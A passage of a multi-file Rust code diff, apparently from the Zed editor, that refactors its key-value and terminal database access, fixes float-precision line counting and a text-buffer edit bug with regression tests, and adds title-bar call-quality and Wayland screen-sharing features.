let typescript_language = Arc::new(
Language::new(
- LanguageConfig::default(),
+ LanguageConfig {
+ name: "TypeScript".into(),
+ ..Default::default()
+ },
Some(tree_sitter_typescript::LANGUAGE_TYPESCRIPT.into()),
)
.with_outline_query(
@@ -532,6 +540,7 @@ mod tests {
(VariableName::WorktreeRoot, path!("/dir").into()),
(VariableName::Row, "1".into()),
(VariableName::Column, "1".into()),
+ (VariableName::Language, "Rust".into()),
]),
project_env: HashMap::default(),
}
@@ -566,6 +575,7 @@ mod tests {
(VariableName::Column, "15".into()),
(VariableName::SelectedText, "is_i".into()),
(VariableName::Symbol, "this_is_a_rust_file".into()),
+ (VariableName::Language, "Rust".into()),
]),
project_env: HashMap::default(),
}
@@ -594,6 +604,7 @@ mod tests {
(VariableName::Row, "1".into()),
(VariableName::Column, "1".into()),
(VariableName::Symbol, "this_is_a_test".into()),
+ (VariableName::Language, "TypeScript".into()),
]),
project_env: HashMap::default(),
}
@@ -207,11 +207,16 @@ impl TerminalBounds {
}
pub fn num_lines(&self) -> usize {
- (self.bounds.size.height / self.line_height).floor() as usize
+ // Tolerance to prevent f32 precision from losing a row:
+ // `N * line_height / line_height` can be N-epsilon, which floor()
+ // would round down, pushing the first line into invisible scrollback.
+ let raw = self.bounds.size.height / self.line_height;
+ raw.next_up().floor() as usize
}
pub fn num_columns(&self) -> usize {
- (self.bounds.size.width / self.cell_width).floor() as usize
+ let raw = self.bounds.size.width / self.cell_width;
+ raw.next_up().floor() as usize
}
pub fn height(&self) -> Pixels {
@@ -3364,5 +3369,59 @@ mod tests {
scroll_by(-1);
}
}
+
+ #[test]
+ fn test_num_lines_float_precision() {
+ let line_heights = [
+ 20.1f32, 16.7, 18.3, 22.9, 14.1, 15.6, 17.8, 19.4, 21.3, 23.7,
+ ];
+ for &line_height in &line_heights {
+ for n in 1..=100 {
+ let height = n as f32 * line_height;
+ let bounds = TerminalBounds::new(
+ px(line_height),
+ px(8.0),
+ Bounds {
+ origin: Point::default(),
+ size: Size {
+ width: px(800.0),
+ height: px(height),
+ },
+ },
+ );
+ assert_eq!(
+ bounds.num_lines(),
+ n,
+ "num_lines() should be {n} for height={height}, line_height={line_height}"
+ );
+ }
+ }
+ }
+
+ #[test]
+ fn test_num_columns_float_precision() {
+ let cell_widths = [8.1f32, 7.3, 9.7, 6.9, 10.1];
+ for &cell_width in &cell_widths {
+ for n in 1..=200 {
+ let width = n as f32 * cell_width;
+ let bounds = TerminalBounds::new(
+ px(20.0),
+ px(cell_width),
+ Bounds {
+ origin: Point::default(),
+ size: Size {
+ width: px(width),
+ height: px(400.0),
+ },
+ },
+ );
+ assert_eq!(
+ bounds.num_columns(),
+ n,
+ "num_columns() should be {n} for width={width}, cell_width={cell_width}"
+ );
+ }
+ }
+ }
}
}
@@ -50,6 +50,7 @@ pub struct TerminalSettings {
pub minimum_contrast: f32,
pub path_hyperlink_regexes: Vec<String>,
pub path_hyperlink_timeout_ms: u64,
+ pub show_count_badge: bool,
}
#[derive(Copy, Clone, Debug, Serialize, Deserialize, JsonSchema, PartialEq, Eq)]
@@ -129,6 +130,7 @@ impl settings::Settings for TerminalSettings {
})
.collect(),
path_hyperlink_timeout_ms: project_content.path_hyperlink_timeout_ms.unwrap(),
+ show_count_badge: user_content.show_count_badge.unwrap(),
}
}
}
@@ -425,7 +425,7 @@ impl Domain for TerminalDb {
];
}
-db::static_connection!(TERMINAL_DB, TerminalDb, [WorkspaceDb]);
+db::static_connection!(TerminalDb, [WorkspaceDb]);
impl TerminalDb {
query! {
@@ -8,7 +8,7 @@ use crate::{
};
use breadcrumbs::Breadcrumbs;
use collections::HashMap;
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use futures::{channel::oneshot, future::join_all};
use gpui::{
Action, AnyView, App, AsyncApp, AsyncWindowContext, Context, Corner, Entity, EventEmitter,
@@ -250,16 +250,17 @@ impl TerminalPanel {
) -> Result<Entity<Self>> {
let mut terminal_panel = None;
- if let Some((database_id, serialization_key)) = workspace
- .read_with(&cx, |workspace, _| {
+ if let Some((database_id, serialization_key, kvp)) = workspace
+ .read_with(&cx, |workspace, cx| {
workspace
.database_id()
.zip(TerminalPanel::serialization_key(workspace))
+ .map(|(id, key)| (id, key, KeyValueStore::global(cx)))
})
.ok()
.flatten()
&& let Some(serialized_panel) = cx
- .background_spawn(async move { KEY_VALUE_STORE.read_kvp(&serialization_key) })
+ .background_spawn(async move { kvp.read_kvp(&serialization_key) })
.await
.log_err()
.flatten()
@@ -939,6 +940,7 @@ impl TerminalPanel {
else {
return;
};
+ let kvp = KeyValueStore::global(cx);
self.pending_serialization = cx.spawn(async move |terminal_panel, cx| {
cx.background_executor()
.timer(Duration::from_millis(50))
@@ -953,17 +955,16 @@ impl TerminalPanel {
});
cx.background_spawn(
async move {
- KEY_VALUE_STORE
- .write_kvp(
- serialization_key,
- serde_json::to_string(&SerializedTerminalPanel {
- items,
- active_item_id: None,
- height,
- width,
- })?,
- )
- .await?;
+ kvp.write_kvp(
+ serialization_key,
+ serde_json::to_string(&SerializedTerminalPanel {
+ items,
+ active_item_id: None,
+ height,
+ width,
+ })?,
+ )
+ .await?;
anyhow::Ok(())
}
.log_err(),
@@ -1606,6 +1607,9 @@ impl Panel for TerminalPanel {
}
fn icon_label(&self, _window: &Window, cx: &App) -> Option<String> {
+ if !TerminalSettings::get_global(cx).show_count_badge {
+ return None;
+ }
let count = self
.center
.panes()
@@ -9,13 +9,13 @@ use assistant_slash_command::SlashCommandRegistry;
use editor::{Editor, EditorSettings, actions::SelectAll, blink_manager::BlinkManager};
use gpui::{
Action, AnyElement, App, ClipboardEntry, DismissEvent, Entity, EventEmitter, ExternalPaths,
- FocusHandle, Focusable, KeyContext, KeyDownEvent, Keystroke, MouseButton, MouseDownEvent,
+ FocusHandle, Focusable, Font, KeyContext, KeyDownEvent, Keystroke, MouseButton, MouseDownEvent,
Pixels, Point, Render, ScrollWheelEvent, Styled, Subscription, Task, WeakEntity, actions,
anchored, deferred, div,
};
use itertools::Itertools;
use menu;
-use persistence::TERMINAL_DB;
+use persistence::TerminalDb;
use project::{Project, ProjectEntryId, search::SearchQuery};
use schemars::JsonSchema;
use serde::Deserialize;
@@ -55,7 +55,7 @@ use workspace::{
CloseActiveItem, DraggedSelection, DraggedTab, NewCenterTerminal, NewTerminal, Pane,
ToolbarItemLocation, Workspace, WorkspaceId, delete_unloaded_items,
item::{
- BreadcrumbText, Item, ItemEvent, SerializableItem, TabContentParams, TabTooltipContent,
+ HighlightedText, Item, ItemEvent, SerializableItem, TabContentParams, TabTooltipContent,
},
register_serializable_item,
searchable::{
@@ -813,17 +813,16 @@ impl TerminalView {
return;
};
- if clipboard.entries().iter().any(|entry| match entry {
- ClipboardEntry::Image(image) => !image.bytes.is_empty(),
- _ => false,
- }) {
- self.forward_ctrl_v(cx);
- return;
- }
-
- if let Some(text) = clipboard.text() {
- self.terminal
- .update(cx, |terminal, _cx| terminal.paste(&text));
+ match clipboard.entries().first() {
+ Some(ClipboardEntry::Image(image)) if !image.bytes.is_empty() => {
+ self.forward_ctrl_v(cx);
+ }
+ _ => {
+ if let Some(text) = clipboard.text() {
+ self.terminal
+ .update(cx, |terminal, _cx| terminal.paste(&text));
+ }
+ }
}
}
@@ -1655,12 +1654,14 @@ impl Item for TerminalView {
}
}
- fn breadcrumbs(&self, cx: &App) -> Option<Vec<BreadcrumbText>> {
- Some(vec![BreadcrumbText {
- text: self.terminal().read(cx).breadcrumb_text.clone(),
- highlights: None,
- font: None,
- }])
+ fn breadcrumbs(&self, cx: &App) -> Option<(Vec<HighlightedText>, Option<Font>)> {
+ Some((
+ vec![HighlightedText {
+ text: self.terminal().read(cx).breadcrumb_text.clone().into(),
+ highlights: vec![],
+ }],
+ None,
+ ))
}
fn added_to_workspace(
@@ -1674,11 +1675,11 @@ impl Item for TerminalView {
log::debug!(
"Updating workspace id for the terminal, old: {old_id:?}, new: {new_id:?}",
);
- cx.background_spawn(TERMINAL_DB.update_workspace_id(
- new_id,
- old_id,
- cx.entity_id().as_u64(),
- ))
+ let db = TerminalDb::global(cx);
+ let entity_id = cx.entity_id().as_u64();
+ cx.background_spawn(async move {
+ db.update_workspace_id(new_id, old_id, entity_id).await
+ })
.detach();
}
self.workspace_id = workspace.database_id();
@@ -1701,7 +1702,8 @@ impl SerializableItem for TerminalView {
_window: &mut Window,
cx: &mut App,
) -> Task<anyhow::Result<()>> {
- delete_unloaded_items(alive_items, workspace_id, "terminals", &TERMINAL_DB, cx)
+ let db = TerminalDb::global(cx);
+ delete_unloaded_items(alive_items, workspace_id, "terminals", &db, cx)
}
fn serialize(
@@ -1726,14 +1728,13 @@ impl SerializableItem for TerminalView {
let custom_title = self.custom_title.clone();
self.needs_serialize = false;
+ let db = TerminalDb::global(cx);
Some(cx.background_spawn(async move {
if let Some(cwd) = cwd {
- TERMINAL_DB
- .save_working_directory(item_id, workspace_id, cwd)
+ db.save_working_directory(item_id, workspace_id, cwd)
.await?;
}
- TERMINAL_DB
- .save_custom_title(item_id, workspace_id, custom_title)
+ db.save_custom_title(item_id, workspace_id, custom_title)
.await?;
Ok(())
}))
@@ -1754,7 +1755,8 @@ impl SerializableItem for TerminalView {
window.spawn(cx, async move |cx| {
let (cwd, custom_title) = cx
.update(|_window, cx| {
- let from_db = TERMINAL_DB
+ let db = TerminalDb::global(cx);
+ let from_db = db
.get_working_directory(item_id, workspace_id)
.log_err()
.flatten();
@@ -1768,7 +1770,7 @@ impl SerializableItem for TerminalView {
.upgrade()
.and_then(|workspace| default_working_directory(workspace.read(cx), cx))
};
- let custom_title = TERMINAL_DB
+ let custom_title = db
.get_custom_title(item_id, workspace_id)
.log_err()
.flatten()
@@ -30,6 +30,24 @@ fn test_edit() {
assert_eq!(buffer.text(), "ghiamnoef");
}
+#[test]
+fn test_point_for_row_and_column_from_external_source() {
+ let buffer = Buffer::new(
+ ReplicaId::LOCAL,
+ BufferId::new(1).unwrap(),
+ "aéøbcdef\nsecond",
+ );
+ let snapshot = buffer.snapshot();
+
+ assert_eq!(snapshot.point_from_external_input(0, 0), Point::new(0, 0));
+ assert_eq!(snapshot.point_from_external_input(0, 4), Point::new(0, 6));
+ assert_eq!(
+ snapshot.point_from_external_input(0, 100),
+ Point::new(0, 10)
+ );
+ assert_eq!(snapshot.point_from_external_input(1, 3), Point::new(1, 3));
+}
+
#[gpui::test(iterations = 100)]
fn test_random_edits(mut rng: StdRng) {
let operations = env::var("OPERATIONS")
@@ -731,6 +749,48 @@ fn test_concurrent_edits() {
assert_eq!(buffer3.text(), "a12c34e56");
}
+// Regression test: applying a remote edit whose FullOffset range partially
+// overlaps a fragment that was already deleted (observed but not visible)
+// used to leave the fragment unsplit, causing the rope builder to read past
+// the end of the rope.
+#[test]
+fn test_edit_partially_intersecting_a_deleted_fragment() {
+ let mut buffer = Buffer::new(ReplicaId::new(1), BufferId::new(1).unwrap(), "abcdefgh");
+
+ // Delete "cde", creating a single deleted fragment at FullOffset 2..5.
+ // After this the fragment layout is:
+ // "ab"(vis, FullOffset 0..2) "cde"(del, 2..5) "fgh"(vis, 5..8)
+ buffer.edit([(2..5, "")]);
+ assert_eq!(buffer.text(), "abfgh");
+
+ // Construct a synthetic remote edit whose version includes the deletion (so
+ // the "cde" fragment is observed + deleted → !was_visible) but whose
+ // FullOffset range only partially overlaps it. This state arises in
+ // production when concurrent edits cause different fragment splits on
+ // different replicas.
+ let synthetic_timestamp = clock::Lamport {
+ replica_id: ReplicaId::new(2),
+ value: 10,
+ };
+ let synthetic_edit = Operation::Edit(EditOperation {
+ timestamp: synthetic_timestamp,
+ version: buffer.version(),
+ // Range 1..4 partially overlaps the deleted "cde" (FullOffset 2..5):
+ // it covers "b" (1..2) and only "cd" (2..4), leaving "e" (4..5) out.
+ ranges: vec![FullOffset(1)..FullOffset(4)],
+ new_text: vec!["".into()],
+ });
+
+ // Without the fix this panics with "cannot summarize past end of rope"
+ // because the full 3-byte "cde" fragment is consumed from the deleted
+ // rope instead of only the 2-byte intersection.
+ buffer.apply_ops([synthetic_edit]);
+ assert_eq!(buffer.text(), "afgh");
+
+ buffer.undo_operations([(synthetic_timestamp, u32::MAX)].into_iter().collect());
+ assert_eq!(buffer.text(), "abfgh");
+}
+
#[gpui::test(iterations = 100)]
fn test_random_concurrent_edits(mut rng: StdRng) {
let peers = env::var("PEERS")
@@ -1234,15 +1234,18 @@ impl Buffer {
let fragment_end = old_fragments.end().0.full_offset();
let mut intersection = fragment.clone();
let intersection_end = cmp::min(range.end, fragment_end);
- if fragment.was_visible(version, &self.undo_map) {
+ if version.observed(fragment.timestamp) {
intersection.len = (intersection_end.0 - fragment_start.0) as u32;
intersection.insertion_offset +=
(fragment_start - old_fragments.start().0.full_offset()) as u32;
intersection.id =
Locator::between(&new_fragments.summary().max_id, &intersection.id);
- intersection.deletions.push(timestamp);
- intersection.visible = false;
- insertion_slices.push(InsertionSlice::from_fragment(timestamp, &intersection));
+ if fragment.was_visible(version, &self.undo_map) {
+ intersection.deletions.push(timestamp);
+ intersection.visible = false;
+ insertion_slices
+ .push(InsertionSlice::from_fragment(timestamp, &intersection));
+ }
}
if intersection.len > 0 {
if fragment.visible && !intersection.visible {
@@ -2254,6 +2257,37 @@ impl BufferSnapshot {
(row_end_offset - row_start_offset) as u32
}
+ /// A function to convert character offsets from e.g. user's `go.mod:22:33` input into byte-offset Point columns.
+ pub fn point_from_external_input(&self, row: u32, characters: u32) -> Point {
+ const MAX_BYTES_IN_UTF_8: u32 = 4;
+
+ let row = row.min(self.max_point().row);
+ let start = Point::new(row, 0);
+ let end = self.clip_point(
+ Point::new(
+ row,
+ characters
+ .saturating_mul(MAX_BYTES_IN_UTF_8)
+ .saturating_add(1),
+ ),
+ Bias::Right,
+ );
+ let range = start..end;
+ let mut point = range.start;
+ let mut remaining_columns = characters;
+
+ for chunk in self.text_for_range(range) {
+ for character in chunk.chars() {
+ if remaining_columns == 0 {
+ return point;
+ }
+ remaining_columns -= 1;
+ point.column += character.len_utf8() as u32;
+ }
+ }
+ point
+ }
+
pub fn line_indents_in_row_range(
&self,
row_range: Range<u32>,
@@ -378,14 +378,14 @@ pub fn set_mode(content: &mut SettingsContent, mode: ThemeAppearanceMode) {
if let Some(selection) = theme.theme.as_mut() {
match selection {
- settings::ThemeSelection::Static(theme) => {
+ settings::ThemeSelection::Static(_) => {
// If the theme was previously set to a single static theme,
- // we don't know whether it was a light or dark theme, so we
- // just use it for both.
+ // reset to the default dynamic light/dark pair and let users
+ // customize light/dark themes explicitly afterward.
*selection = settings::ThemeSelection::Dynamic {
- mode,
- light: theme.clone(),
- dark: theme.clone(),
+ mode: ThemeAppearanceMode::System,
+ light: ThemeName(settings::DEFAULT_LIGHT_THEME.into()),
+ dark: ThemeName(settings::DEFAULT_DARK_THEME.into()),
};
}
settings::ThemeSelection::Dynamic {
@@ -311,10 +311,11 @@ impl PickerDelegate for IconThemeSelectorDelegate {
.border_color(cx.theme().colors().border_variant)
.child(
Button::new("docs", "View Icon Theme Docs")
- .icon(IconName::ArrowUpRight)
- .icon_position(IconPosition::End)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(|_event, _window, cx| {
cx.open_url("https://zed.dev/docs/icon-themes");
}),
@@ -497,10 +497,11 @@ impl PickerDelegate for ThemeSelectorDelegate {
.border_color(cx.theme().colors().border_variant)
.child(
Button::new("docs", "View Theme Docs")
- .icon(IconName::ArrowUpRight)
- .icon_position(IconPosition::End)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::ArrowUpRight)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(cx.listener(|_, _, _, cx| {
cx.open_url("https://zed.dev/docs/themes");
})),
@@ -38,13 +38,15 @@ chrono.workspace = true
client.workspace = true
cloud_api_types.workspace = true
db.workspace = true
-feature_flags.workspace = true
git_ui.workspace = true
gpui = { workspace = true, features = ["screen-capture"] }
+icons.workspace = true
+livekit_client.workspace = true
notifications.workspace = true
project.workspace = true
recent_projects.workspace = true
remote.workspace = true
+remote_connection.workspace = true
rpc.workspace = true
semver.workspace = true
schemars.workspace = true
@@ -114,8 +114,9 @@ impl ApplicationMenu {
name,
action,
checked,
+ disabled,
..
- } => menu.action_checked(name, action, checked),
+ } => menu.action_checked_with_disabled(name, action, checked, disabled),
OwnedMenuItem::Submenu(submenu) => {
submenu
.items
@@ -126,8 +127,10 @@ impl ApplicationMenu {
name,
action,
checked,
+ disabled,
..
- } => menu.action_checked(name, action, checked),
+ } => menu
+ .action_checked_with_disabled(name, action, checked, disabled),
OwnedMenuItem::Submenu(_) => menu,
OwnedMenuItem::SystemMenu(_) => {
// A system menu doesn't make sense in this context, so ignore it
@@ -9,7 +9,10 @@ use gpui::{
canvas, point,
};
use gpui::{App, Task, Window};
+use icons::IconName;
+use livekit_client::ConnectionQuality;
use project::WorktreeSettings;
+use remote_connection::RemoteConnectionModal;
use rpc::proto::{self};
use settings::{Settings as _, SettingsLocation};
use theme::ActiveTheme;
@@ -19,9 +22,17 @@ use ui::{
};
use util::rel_path::RelPath;
use workspace::{ParticipantLocation, notifications::DetachAndPromptErr};
+use zed_actions::ShowCallStats;
use crate::TitleBar;
+fn format_stat(value: Option<f64>, format: impl Fn(f64) -> String) -> String {
+ match value {
+ Some(v) => format(v),
+ None => "—".to_string(),
+ }
+}
+
pub fn toggle_screen_sharing(
screen: anyhow::Result<Option<Rc<dyn ScreenCaptureSource>>>,
window: &mut Window,
@@ -332,7 +343,11 @@ impl TitleBar {
let is_connecting_to_project = self
.workspace
- .update(cx, |workspace, cx| workspace.has_active_modal(window, cx))
+ .update(cx, |workspace, cx| {
+ workspace
+ .active_modal::<RemoteConnectionModal>(cx)
+ .is_some()
+ })
.unwrap_or(false);
let room = room.read(cx);
@@ -347,6 +362,11 @@ impl TitleBar {
let can_share_projects = room.can_share_projects();
let screen_sharing_supported = cx.is_screen_capture_supported();
+ let stats = room
+ .diagnostics()
+ .map(|d| d.read(cx).stats().clone())
+ .unwrap_or_default();
+
let channel_store = ChannelStore::global(cx);
let channel = room
.channel_id()
@@ -354,6 +374,45 @@ impl TitleBar {
let mut children = Vec::new();
+ let effective_quality = stats.effective_quality.unwrap_or(ConnectionQuality::Lost);
+ let (signal_icon, signal_color, quality_label) = match effective_quality {
+ ConnectionQuality::Excellent => {
+ (IconName::SignalHigh, Some(Color::Success), "Excellent")
+ }
+ ConnectionQuality::Good => (IconName::SignalHigh, None, "Good"),
+ ConnectionQuality::Poor => (IconName::SignalMedium, Some(Color::Warning), "Poor"),
+ ConnectionQuality::Lost => (IconName::SignalLow, Some(Color::Error), "Lost"),
+ };
+ let quality_label: SharedString = quality_label.into();
+ children.push(
+ IconButton::new("call-quality", signal_icon)
+ .style(ButtonStyle::Subtle)
+ .icon_size(IconSize::Small)
+ .when_some(signal_color, |button, color| button.icon_color(color))
+ .tooltip(move |_window, cx| {
+ let quality_label = quality_label.clone();
+ let latency = format_stat(stats.latency_ms, |v| format!("{:.0}ms", v));
+ let jitter = format_stat(stats.jitter_ms, |v| format!("{:.0}ms", v));
+ let packet_loss = format_stat(stats.packet_loss_pct, |v| format!("{:.1}%", v));
+ let input_lag =
+ format_stat(stats.input_lag.map(|d| d.as_secs_f64() * 1000.0), |v| {
+ format!("{:.1}ms", v)
+ });
+
+ Tooltip::with_meta(
+ format!("Connection: {quality_label}"),
+ Some(&ShowCallStats),
+ format!(
+ "Latency: {latency} · Jitter: {jitter} · Loss: {packet_loss} · Input lag: {input_lag}",
+ ),
+ cx,
+ )
+ })
+ .on_click(move |_, window, cx| {
+ window.dispatch_action(Box::new(ShowCallStats), cx);
+ })
+ .into_any_element(),
+ );
children.push(
h_flex()
.gap_1()
@@ -489,6 +548,11 @@ impl TitleBar {
);
if can_use_microphone && screen_sharing_supported {
+ #[cfg(target_os = "linux")]
+ let is_wayland = gpui::guess_compositor() == "Wayland";
+ #[cfg(not(target_os = "linux"))]
+ let is_wayland = false;
+
let trigger = IconButton::new("screen-share", IconName::Screen)
.style(ButtonStyle::Subtle)
.icon_size(IconSize::Small)
@@ -505,28 +569,56 @@ impl TitleBar {
.room()
.is_some_and(|room| !room.read(cx).is_sharing_screen());
- window
- .spawn(cx, async move |cx| {
- let screen = if should_share {
- cx.update(|_, cx| pick_default_screen(cx))?.await
- } else {
- Ok(None)
- };
- cx.update(|window, cx| toggle_screen_sharing(screen, window, cx))?;
+ #[cfg(target_os = "linux")]
+ {
+ if is_wayland
+ && let Some(room) = ActiveCall::global(cx).read(cx).room().cloned()
+ {
+ let task = room.update(cx, |room, cx| {
+ if should_share {
+ room.share_screen_wayland(cx)
+ } else {
+ room.unshare_screen(true, cx)
+ .map(|()| Task::ready(Ok(())))
+ .unwrap_or_else(|e| Task::ready(Err(e)))
+ }
+ });
+ task.detach_and_prompt_err(
+ "Sharing Screen Failed",
+ window,
+ cx,
+ |e, _, _| Some(format!("{e:?}")),
+ );
+ }
+ }
+ if !is_wayland {
+ window
+ .spawn(cx, async move |cx| {
+ let screen = if should_share {
+ cx.update(|_, cx| pick_default_screen(cx))?.await
+ } else {
+ Ok(None)
+ };
+ cx.update(|window, cx| toggle_screen_sharing(screen, window, cx))?;
- Result::<_, anyhow::Error>::Ok(())
- })
- .detach();
+ Result::<_, anyhow::Error>::Ok(())
+ })
+ .detach();
+ }
});
- children.push(
- SplitButton::new(
- trigger.render(window, cx),
- self.render_screen_list().into_any_element(),
- )
- .style(SplitButtonStyle::Transparent)
- .into_any_element(),
- );
+ if is_wayland {
+ children.push(trigger.into_any_element());
+ } else {
+ children.push(
+ SplitButton::new(
+ trigger.render(window, cx),
+ self.render_screen_list().into_any_element(),
+ )
+ .style(SplitButtonStyle::Transparent)
+ .into_any_element(),
+ );
+ }
}
children.push(div().pr_2().into_any_element());
@@ -44,7 +44,7 @@ impl OnboardingBanner {
subtitle: subtitle.or(Some(SharedString::from("Introducing:"))),
},
visible_when: None,
- dismissed: get_dismissed(source),
+ dismissed: get_dismissed(source, cx),
}
}
@@ -75,9 +75,9 @@ fn dismissed_at_key(source: &str) -> String {
}
}
-fn get_dismissed(source: &str) -> bool {
+fn get_dismissed(source: &str, cx: &App) -> bool {
let dismissed_at = dismissed_at_key(source);
- db::kvp::KEY_VALUE_STORE
+ db::kvp::KeyValueStore::global(cx)
.read_kvp(&dismissed_at)
.log_err()
.is_some_and(|dismissed| dismissed.is_some())
@@ -85,9 +85,10 @@ fn get_dismissed(source: &str) -> bool {
fn persist_dismissed(source: &str, cx: &mut App) {
let dismissed_at = dismissed_at_key(source);
- cx.spawn(async |_| {
+ let kvp = db::kvp::KeyValueStore::global(cx);
+ cx.spawn(async move |_| {
let time = chrono::Utc::now().to_rfc3339();
- db::kvp::KEY_VALUE_STORE.write_kvp(dismissed_at, time).await
+ kvp.write_kvp(dismissed_at, time).await
})
.detach_and_log_err(cx);
}
@@ -105,7 +106,8 @@ pub fn restore_banner(cx: &mut App) {
let source = &cx.global::<BannerGlobal>().entity.read(cx).source;
let dismissed_at = dismissed_at_key(source);
- cx.spawn(async |_| db::kvp::KEY_VALUE_STORE.delete_kvp(dismissed_at).await)
+ let kvp = db::kvp::KeyValueStore::global(cx);
+ cx.spawn(async move |_| kvp.delete_kvp(dismissed_at).await)
.detach_and_log_err(cx);
}
@@ -33,6 +33,7 @@ impl RenderOnce for PlanChip {
Plan::ZedFree => ("Free", Color::Default, free_chip_bg),
Plan::ZedProTrial => ("Pro Trial", Color::Accent, pro_chip_bg),
Plan::ZedPro => ("Pro", Color::Accent, pro_chip_bg),
+ Plan::ZedBusiness => ("Business", Color::Accent, pro_chip_bg),
Plan::ZedStudent => ("Student", Color::Accent, pro_chip_bg),
};
@@ -14,6 +14,7 @@ pub use platform_title_bar::{
self, DraggedWindowTab, MergeAllWindows, MoveTabToNewWindow, PlatformTitleBar,
ShowNextWindowTab, ShowPreviousWindowTab,
};
+use project::linked_worktree_short_name;
#[cfg(not(target_os = "macos"))]
use crate::application_menu::{
@@ -24,19 +25,18 @@ use auto_update::AutoUpdateStatus;
use call::ActiveCall;
use client::{Client, UserStore, zed_urls};
use cloud_api_types::Plan;
-use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt};
+
use gpui::{
Action, AnyElement, App, Context, Corner, Element, Empty, Entity, Focusable,
InteractiveElement, IntoElement, MouseButton, ParentElement, Render,
StatefulInteractiveElement, Styled, Subscription, WeakEntity, Window, actions, div,
};
use onboarding_banner::OnboardingBanner;
-use project::{
- DisableAiSettings, Project, git_store::GitStoreEvent, trusted_worktrees::TrustedWorktrees,
-};
+use project::{Project, git_store::GitStoreEvent, trusted_worktrees::TrustedWorktrees};
use remote::RemoteConnectionOptions;
use settings::Settings;
use settings::WorktreeId;
+use std::collections::HashSet;
use std::sync::Arc;
use theme::ActiveTheme;
use title_bar_settings::TitleBarSettings;
@@ -47,8 +47,7 @@ use ui::{
use update_version::UpdateVersion;
use util::ResultExt;
use workspace::{
- MultiWorkspace, ToggleWorkspaceSidebar, ToggleWorktreeSecurity, Workspace,
- notifications::NotifyResultExt,
+ MultiWorkspace, ToggleWorktreeSecurity, Workspace, WorkspaceId, notifications::NotifyResultExt,
};
use zed_actions::OpenRemote;
@@ -157,24 +156,46 @@ pub struct TitleBar {
banner: Entity<OnboardingBanner>,
update_version: Entity<UpdateVersion>,
screen_share_popover_handle: PopoverMenuHandle<ContextMenu>,
+ _diagnostics_subscription: Option<gpui::Subscription>,
}
impl Render for TitleBar {
fn render(&mut self, window: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
let title_bar_settings = *TitleBarSettings::get_global(cx);
+ let button_layout = title_bar_settings.button_layout;
let show_menus = show_menus(cx);
let mut children = Vec::new();
+ let mut project_name = None;
+ let mut repository = None;
+ let mut linked_worktree_name = None;
+ if let Some(worktree) = self.effective_active_worktree(cx) {
+ repository = self.get_repository_for_worktree(&worktree, cx);
+ let worktree = worktree.read(cx);
+ project_name = worktree
+ .root_name()
+ .file_name()
+ .map(|name| SharedString::from(name.to_string()));
+ linked_worktree_name = repository.as_ref().and_then(|repo| {
+ let repo = repo.read(cx);
+ linked_worktree_short_name(
+ repo.original_repo_abs_path.as_ref(),
+ repo.work_directory_abs_path.as_ref(),
+ )
+ .filter(|name| Some(name) != project_name.as_ref())
+ });
+ }
+
children.push(
h_flex()
+ .h_full()
.gap_0p5()
.map(|title_bar| {
let mut render_project_items = title_bar_settings.show_branch_name
|| title_bar_settings.show_project_items;
title_bar
- .children(self.render_workspace_sidebar_toggle(window, cx))
.when_some(
self.application_menu.clone().filter(|_| !show_menus),
|title_bar, menu| {
@@ -189,11 +210,18 @@ impl Render for TitleBar {
.when(title_bar_settings.show_project_items, |title_bar| {
title_bar
.children(self.render_project_host(cx))
- .child(self.render_project_name(window, cx))
- })
- .when(title_bar_settings.show_branch_name, |title_bar| {
- title_bar.children(self.render_project_branch(cx))
+ .child(self.render_project_name(project_name, window, cx))
})
+ .when_some(
+ repository.filter(|_| title_bar_settings.show_branch_name),
+ |title_bar, repository| {
+ title_bar.children(self.render_project_branch(
+ repository,
+ linked_worktree_name,
+ cx,
+ ))
+ },
+ )
})
})
.on_mouse_down(MouseButton::Left, |_, _, cx| cx.stop_propagation())
@@ -239,6 +267,7 @@ impl Render for TitleBar {
if show_menus {
self.platform_titlebar.update(cx, |this, _| {
+ this.set_button_layout(button_layout);
this.set_children(
self.application_menu
.clone()
@@ -266,6 +295,7 @@ impl Render for TitleBar {
.into_any_element()
} else {
self.platform_titlebar.update(cx, |this, _| {
+ this.set_button_layout(button_layout);
this.set_children(children);
});
self.platform_titlebar.clone().into_any_element()
@@ -333,6 +363,7 @@ impl TitleBar {
}),
);
subscriptions.push(cx.observe(&user_store, |_a, _, cx| cx.notify()));
+ subscriptions.push(cx.observe_button_layout_changed(window, |_, _, cx| cx.notify()));
if let Some(trusted_worktrees) = TrustedWorktrees::try_get_global(cx) {
subscriptions.push(cx.subscribe(&trusted_worktrees, |_, _, _, cx| {
cx.notify();
@@ -370,20 +401,16 @@ impl TitleBar {
return;
};
- let is_open = multi_workspace.read(cx).is_sidebar_open();
- let has_notifications = multi_workspace.read(cx).sidebar_has_notifications(cx);
+ let is_open = multi_workspace.read(cx).sidebar_open();
platform_titlebar.update(cx, |titlebar, cx| {
titlebar.set_workspace_sidebar_open(is_open, cx);
- titlebar.set_sidebar_has_notifications(has_notifications, cx);
});
let platform_titlebar = platform_titlebar.clone();
let subscription = cx.observe(&multi_workspace, move |mw, cx| {
- let is_open = mw.read(cx).is_sidebar_open();
- let has_notifications = mw.read(cx).sidebar_has_notifications(cx);
+ let is_open = mw.read(cx).sidebar_open();
platform_titlebar.update(cx, |titlebar, cx| {
titlebar.set_workspace_sidebar_open(is_open, cx);
- titlebar.set_sidebar_has_notifications(has_notifications, cx);
});
});
@@ -398,7 +425,7 @@ impl TitleBar {
.detach();
}
- Self {
+ let mut this = Self {
platform_titlebar,
application_menu,
workspace: workspace.weak_handle(),
@@ -410,7 +437,12 @@ impl TitleBar {
banner,
update_version,
screen_share_popover_handle: PopoverMenuHandle::default(),
- }
+ _diagnostics_subscription: None,
+ };
+
+ this.observe_diagnostics(cx);
+
+ this
}
fn worktree_count(&self, cx: &App) -> usize {
@@ -484,14 +516,15 @@ impl TitleBar {
let git_store = project.git_store().read(cx);
let worktree_path = worktree.read(cx).abs_path();
- for repo in git_store.repositories().values() {
- let repo_path = &repo.read(cx).work_directory_abs_path;
